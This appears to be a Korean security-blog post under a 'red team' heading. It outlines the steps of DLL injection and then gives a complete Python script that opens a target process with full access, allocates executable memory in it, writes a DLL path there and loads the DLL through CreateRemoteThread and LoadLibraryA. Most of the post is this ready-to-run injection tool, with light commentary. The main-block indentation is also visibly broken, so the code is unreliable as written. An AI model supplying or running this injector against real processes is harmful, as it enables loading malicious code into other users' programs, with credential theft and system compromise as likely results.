[정보] DLL Injection 파이썬 코드

DLL Injection 공격 흐름

실행 중인 프로세스를 대상으로 합니다.
프로세스 주소 공간에 메모리를 할당합니다.
DLL 경로를 해당 메모리에 씁니다.
대상 프로세스의 스레드에서 DLL을 로드하는 함수를 실행합니다.

import ctypes # ctypes 모듈 임포트
import sys # sys 모듈 임포트
import os # os 모듈 임포트
import psutil # psutil 모듈 임포트

def inject_dll(target_process_name, dll_path):
    # 대상 프로세스를 찾습니다.
    target_pid = None
    for process in psutil.process_iter(['name', 'pid']):
        if process.info['name'] == target_process_name:
            target_pid = process.info['pid']
            break

    if target_pid is None:
        print(f"Process '{target_process_name}' not found.") # 찾는 프로세스가 없으면 에러를 출력하고
        return False # False 값을 반환합니다.

    # 대상 프로세스에 대한 핸들을 얻습니다.
    PROCESS_ALL_ACCESS = 0x1F0FFF
    target_process_handle = ctypes.windll.kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, target_pid)

    if target_process_handle is None:
        print("Failed to obtain process handle.") # 프로세스 핸들을 얻을 수 없으면 에러를 출력하고
        return False # False 값을 반환합니다.

    # 프로세스 주소 공간에 메모리를 할당합니다.
    dll_path_bytes = bytes(dll_path, 'UTF-8')
    dll_path_length = len(dll_path_bytes) + 1
    remote_memory_address = ctypes.windll.kernel32.VirtualAllocEx(target_process_handle, None, dll_path_length, 0x3000, 0x40)

    if remote_memory_address is None:
        print("Failed to allocate memory in the target process.") # 메모리를 할당할 수 없으면 에러를 출력하고
        return False # False 값을 반환합니다.

    # DLL 경로를 해당 메모리에 씁니다.
    if ctypes.windll.kernel32.WriteProcessMemory(target_process_handle, remote_memory_address, dll_path_bytes, dll_path_length, None) == 0:
        print("Failed to write the DLL path to the target process.") # DLL 경로를 메모리에 쓸 수 없으면 에러를 출력하고
        return False # False 값을 반환합니다.

    # 대상 프로세스의 스레드에서 LoadLibraryA 함수를 실행하여 DLL을 로드합니다.
    kernel32_handle = ctypes.windll.kernel32.GetModuleHandleW('kernel32.dll')
    loadlibrary_address = ctypes.windll.kernel32.GetProcAddress(kernel32_handle, 'LoadLibraryA')

    if ctypes.windll.kernel32.CreateRemoteThread(target_process_handle, None, 0, loadlibrary_address, remote_memory_address, 0, None) == 0:
        print("Failed to create remote thread in the target process.") # 원격 스레드를 생성할 수 없으면 에러를 출력하고
        return False # False 값을 반환합니다.

    print(f"Successfully injected '{dll_path}' into '{target_process_name}'") # DLL 인젝션이 성공했을 경우 메시지를 출력하고
    return True # True 값을 반환합니다.
    
    if __name__ == "__main__":
    if len(sys.argv) != 3: # 만약 명령줄 인자가 3개가 아니면
        print("Usage: python dll_injector.py <target_process_name> <dll_path>") # 사용법을 출력하고
        sys.exit() # 종료합니다.

    target_process_name = sys.argv[1] # 첫번째 인자를 target_process_name 변수에 할당
    dll_path = sys.argv[2] # 두번째 인자를 dll_path 변수에 할당

    if not os.path.exists(dll_path): # 만약 dll_path에 해당하는 파일이 존재하지 않으면
        print(f"Error: DLL file '{dll_path}' does not exist.") # 에러를 출력하고
        sys.exit() # 종료합니다.

    inject_dll(target_process_name, dll_path) # inject_dll 함수를 호출하여 DLL 인젝션을 수행합니다.

위 코드는 스크립트를 실행할 때 python dll_injector.py <target_process_name> <dll_path>와 같은 형식으로 명령줄 인자를 전달합니다. sys.argv 리스트는 스크립트를 실행할 때 전달된 명령줄 인자들을 담고 있습니다.

len(sys.argv)가 3이 아닐 경우, 스크립트의 사용법을 출력하고 sys.exit() 함수를 사용하여 프로그램을 종료합니다.

sys.argv[1]은 target_process_name 변수에 할당되고, sys.argv[2]는 dll_path 변수에 할당됩니다. 만약 dll_path에 해당하는 파일이 존재하지 않을 경우, 에러를 출력하고 프로그램을 종료합니다.

마지막으로 inject_dll 함수를 호출하여 target_process_name 프로세스에 dll_path에 해당하는 DLL을 인젝션합니다.

저작자표시 비영리 변경금지

'🤖정보보안 > ❤️레드팀' 카테고리의 다른 글

[정보] 해시 (0)	2023.06.27
[정보] http 공격 스킬 (0)	2023.06.27
[정보] 다른 원격지에 있는 프로그램과 통신하는 방법 (0)	2023.02.15
[정보] HTTPs/TLS Attacks이란 (0)	2023.02.15
[정보] 리버싱 기초 개념 (0)	2023.02.15

'🤖정보보안 > ❤️레드팀' 카테고리의 다른 글

티스토리툴바